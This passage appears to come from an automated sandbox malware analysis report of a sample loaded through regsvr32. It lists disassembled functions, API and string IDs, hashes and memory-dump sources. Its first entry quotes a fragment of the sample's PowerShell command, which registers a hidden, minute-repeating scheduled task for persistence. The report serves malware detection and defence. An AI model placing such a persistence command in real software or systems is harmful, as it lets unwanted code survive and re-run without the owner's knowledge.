                                                                    • String ID: L ") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName '' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)
                                                                    • API String ID: 2726895772-433569715
                                                                    • Opcode ID: bf69bdb1d7f2675f84f86c4ec97c46a2f813a296ea921ac4525269e720b5fafd
                                                                    • Instruction ID: d9fc8e4b58b7b1eebe6f75096b324035a0c2519e890f451510b31aabe346b41d
                                                                    • Opcode Fuzzy Hash: bf69bdb1d7f2675f84f86c4ec97c46a2f813a296ea921ac4525269e720b5fafd
                                                                    • Instruction Fuzzy Hash: 69F1A42261DA8186DB61DB21E45046BBBA0FBC9784F548336FADD47BA9DF3CD641CB00
                                                                    Function 00007FFDFB216163 Relevance: 16.3, APIs: 7, Strings: 2, Instructions: 542fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ControlCreateDeviceDiskFileFreeSpacememcmpmemcpy
                                                                    • String ID: OI$TI
                                                                    • API String ID: 230461707-128833160
                                                                    • Opcode ID: bf1e5939c47eb74e637d5fb777439dc4fbeb881023a076ee875a63158673ee82
                                                                    • Instruction ID: 2534f3f4c83ac8610e4b15e989efb6f2eecb260c0063de5d22a955f63cdd1d68
                                                                    • Opcode Fuzzy Hash: bf1e5939c47eb74e637d5fb777439dc4fbeb881023a076ee875a63158673ee82
                                                                    • Instruction Fuzzy Hash: 8B427222B0E6C390F7719B01E424BEE66A0FB85784F045135DAAC86AEDDF7DD084DB41
                                                                    Function 00007FFDFB2ABE80 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 411synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorObjectSingleStatusWaitmemcpy
                                                                    • String ID: -pty$cygw$msys$win-
                                                                    • API String ID: 2933437151-1440016460
                                                                    • Opcode ID: 8f02847d1ed428cd4c7577fc284afbe1914e79c24072a468abdfbab29ae796be
                                                                    • Instruction ID: 8c158235c21782d8188f597112934c0e97c8665f31c01fb91d6d1a29822584bb
                                                                    • Opcode Fuzzy Hash: 8f02847d1ed428cd4c7577fc284afbe1914e79c24072a468abdfbab29ae796be
                                                                    • Instruction Fuzzy Hash: 6402D522B0A7829AF7609B68DC60BF92794EB44388F544135EA6D8BBDDDF3CD585C300
                                                                    Function 00007FFDFB21A660 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 442COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: H$H
                                                                    • API String ID: 2221118986-136785262
                                                                    • Opcode ID: f29fe778d85692410cca65d8c0efbf48e7a3d409e8377b04913b479e708d458f
                                                                    • Instruction ID: 4f9a0ba9177dbbdf45c608558beed9ba77f18d0c0e56c74717c1946323888020
                                                                    • Opcode Fuzzy Hash: f29fe778d85692410cca65d8c0efbf48e7a3d409e8377b04913b479e708d458f
                                                                    • Instruction Fuzzy Hash: 23020723B19B8682DB118F299410AB96760FB56BA4F54A722DFBE433E5DF3DD185C300
                                                                    Function 00007FFDFB21ADA0 Relevance: 5.5, APIs: 4, Instructions: 473COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 17ba022a7d551e7a887192520d722618291e79d5bf0b22fceea55ecc7af7dec7
                                                                    • Instruction ID: 9a27878d26cdd768a5f8844fe015426b9de2cc885a0971e96bbb2efa43606ba5
                                                                    • Opcode Fuzzy Hash: 17ba022a7d551e7a887192520d722618291e79d5bf0b22fceea55ecc7af7dec7
                                                                    • Instruction Fuzzy Hash: 83220712E1ABC582E7018B2885157F92720FBA9798F45B334DFBD562E6EF39E195C300
                                                                    Function 00007FFDFB2694A0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BCryptGenRandom.BCRYPT(?,00000000,00000000,00007FFDFB268FE5,?,?,00000000,00007FFDFB265B81), ref: 00007FFDFB2694E2
                                                                    • SystemFunction036.ADVAPI32(?,00000000,00000000,00007FFDFB268FE5,?,?,00000000,00007FFDFB265B81), ref: 00007FFDFB2694F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CryptFunction036RandomSystem
                                                                    • String ID:
                                                                    • API String ID: 1232939966-0
                                                                    • Opcode ID: 8c3f8ec892ce3af16b0af55f2ba24b1024e06f975336119adb2d3dc77502f212
                                                                    • Instruction ID: a106d8b4bee0ffedd33aa56b52b6c66b8aa50bc3c72a8b124ca73e94675edce7
                                                                    • Opcode Fuzzy Hash: 8c3f8ec892ce3af16b0af55f2ba24b1024e06f975336119adb2d3dc77502f212
                                                                    • Instruction Fuzzy Hash: 0DF0F062F1B19649FF74246B5E19EB195820F187F4C284331AD3CC3AEAAC2858825210
                                                                    Function 00007FFDFB215BE0 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Versionmemset
                                                                    • String ID:
                                                                    • API String ID: 3136939366-0
                                                                    • Opcode ID: 92f276b95c9412c8838e8edfa986efb751212cd665cf99de9ccdbafe4ee7030b
                                                                    • Instruction ID: 58483280aed956e0eba6cca25acfcb3c89756d5710dd2d441587f3133377af8a
                                                                    • Opcode Fuzzy Hash: 92f276b95c9412c8838e8edfa986efb751212cd665cf99de9ccdbafe4ee7030b
                                                                    • Instruction Fuzzy Hash: 60F0F632B0A61B92E770AE12E0117BA62908B88744F444171DBAD437F8CE3CD9068F04
                                                                    Function 00007FFDFB211C60 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 547ac9d1fa80003c072093df209460cb2d78731ac40638971273e09c1edc407b
                                                                    • Instruction ID: fe68edecaa010ee391c4119b3baae6eab0c997e363c0471084e0cf6ef8e1da93
                                                                    • Opcode Fuzzy Hash: 547ac9d1fa80003c072093df209460cb2d78731ac40638971273e09c1edc407b
                                                                    • Instruction Fuzzy Hash: 1941D322B0A75682F7619B15E460BB966A0FF88784F445131EAED477EDDE3CD5428300
                                                                    Function 00007FFDFB214380 Relevance: 1.6, APIs: 1, Instructions: 59comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID:
                                                                    • API String ID: 542301482-0
                                                                    • Opcode ID: 65c99bcea707947771c2063d95bc6e976da4805a9c62869e954726bbee57f278
                                                                    • Instruction ID: ffd82a09ebffcb04900c44bd84465107370201e27c5578b3cd11f8646cad7f27
                                                                    • Opcode Fuzzy Hash: 65c99bcea707947771c2063d95bc6e976da4805a9c62869e954726bbee57f278
                                                                    • Instruction Fuzzy Hash: 2121A43270AA4291E7219B11E460BAA77A4FB84794F544130EBED47BE9DF7CD1918700
                                                                    Function 00007FFDFB2B8AA0 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 481COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FullNamePath
                                                                    • String ID: \\?\$\\?\UNC\
                                                                    • API String ID: 2482867836-3019864461
                                                                    • Opcode ID: f987178dd3b3f82022f953fc169ff115279cc16a8549942425500b39b729e88a
                                                                    • Instruction ID: 7317b774bf54335eafa95e4bdd3635bb56cff996e8bca67f179bee7d4ebc7a6c
                                                                    • Opcode Fuzzy Hash: f987178dd3b3f82022f953fc169ff115279cc16a8549942425500b39b729e88a
                                                                    • Instruction Fuzzy Hash: D012F7A2B0A69389EB749B21C464BB92395FB04BD4F44C535DA6C8B7EDDF3CE5818700
                                                                    Function 00007FFDFB2B6AA0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 276libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
                                                                    • String ID: SetThreadDescription$kernel32
                                                                    • API String ID: 1783792165-1950310818
                                                                    • Opcode ID: 41d5366597417468d2c84e3e1d372b1b21ce52746e922d497d61c5bed90c9ffd
                                                                    • Instruction ID: b60e53dab79714110e3e588cfe6fd359bc5fdaeb8de2bb7be2935440beac8878
                                                                    • Opcode Fuzzy Hash: 41d5366597417468d2c84e3e1d372b1b21ce52746e922d497d61c5bed90c9ffd
                                                                    • Instruction Fuzzy Hash: D8B1A162B0A6838AEB269B11DC64BF9A665FF44BC8F448031DD6D977EDDE3CD2418700
                                                                    Function 00007FFDFB2157C0 Relevance: 18.2, APIs: 12, Instructions: 219COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value$PrngProcess
                                                                    • String ID:
                                                                    • API String ID: 3259538350-0
                                                                    • Opcode ID: cfcbfefdd9e33552643352429b236e553508dad3f7d1eeb3e44439b765618666
                                                                    • Instruction ID: 5817771638ccd745d4cf7828296bff59e8f2abd46a5c246b8f32ba69f03e5338
                                                                    • Opcode Fuzzy Hash: cfcbfefdd9e33552643352429b236e553508dad3f7d1eeb3e44439b765618666
                                                                    • Instruction Fuzzy Hash: 68811221F0B65742FB156B158520BBD52D1AF84BD0F099471DEAC873FEDE2DA8428380
                                                                    Function 00007FFDFB20E670 Relevance: 16.7, APIs: 11, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value$PrngProcessVersionmemset
                                                                    • String ID:
                                                                    • API String ID: 1585940240-0
                                                                    • Opcode ID: 1f6d258840ea14e6c065f27eeb8c34b1f360a06c8dabc480339fcc7cba82b9b0
                                                                    • Instruction ID: 4c3a5049cce953e170ebdc651a56ef523397fb33851ab08729c605682da8a56c
                                                                    • Opcode Fuzzy Hash: 1f6d258840ea14e6c065f27eeb8c34b1f360a06c8dabc480339fcc7cba82b9b0
                                                                    • Instruction Fuzzy Hash: 13711721F0E65752FB656B1594607FD66A0AF88B80F0C9171DBAD877FEDE2CE9418300
                                                                    Function 00007FFDFB21656C Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 458COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Volume$NameNamesPath
                                                                    • String ID: OI$TI
                                                                    • API String ID: 1552044656-128833160
                                                                    • Opcode ID: 62f032ec465d3798ef01c4089d649f9cf3ee10aaad0414ccb3deae31c2f2a27f
                                                                    • Instruction ID: 0c9beb16474fb4046313707a57f5e44eede52ff1d83e90e2bd9a2429f0a8a81e
                                                                    • Opcode Fuzzy Hash: 62f032ec465d3798ef01c4089d649f9cf3ee10aaad0414ccb3deae31c2f2a27f
                                                                    • Instruction Fuzzy Hash: BA324F22B0E6C291EB719B15E454BEEA3A0FB84794F445235CAAC43AEDDF7DD484CB40
                                                                    Function 00007FFDFB27A880 Relevance: 15.5, APIs: 8, Strings: 2, Instructions: 483COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • assertion failed: new_left_len <= CAPACITY, xrefs: 00007FFDFB27AC43
                                                                    • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FFDFB27B213
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
                                                                    • API String ID: 3510742995-2079967719
                                                                    • Opcode ID: 3bf318296a2faa0e97b7af8703ec710a53762a8deb6518adb9d9b506360eddcd
                                                                    • Instruction ID: b7c2bafc64fa9d30670a6c2fc8fe380f950463d23ccf97ad92f99da3fd71e25a
                                                                    • Opcode Fuzzy Hash: 3bf318296a2faa0e97b7af8703ec710a53762a8deb6518adb9d9b506360eddcd
                                                                    • Instruction Fuzzy Hash: 5E42C032616BC685E721CF24E8507ED33A8FB68788F548236DE9D5B7A8DF749295C300
                                                                    Function 00007FFDFB302F10 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: QueryVirtual
